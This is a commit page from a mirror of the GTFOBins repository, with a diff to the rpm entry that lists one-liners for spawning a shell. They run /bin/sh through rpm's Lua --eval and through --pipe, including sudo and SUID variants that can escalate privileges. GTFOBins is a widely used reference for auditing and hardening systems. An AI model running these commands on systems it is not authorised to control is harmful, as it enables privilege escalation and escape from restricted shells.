mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 06:19:27 +01:00
Upgrade to shell
This commit is contained in:
parent
ecb1840df3
commit
9800048833
@ -2,12 +2,9 @@
|
||||
functions:
|
||||
shell:
|
||||
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||
command:
|
||||
- code: |
|
||||
rpm --pipe '/bin/id > /tmp/result'
|
||||
cat /tmp/result
|
||||
- code: rpm --pipe '/bin/sh 0<&1'
|
||||
limited-suid:
|
||||
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||
sudo:
|
||||
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||
- description: |
|
||||
|
Loading…
Reference in New Issue
Block a user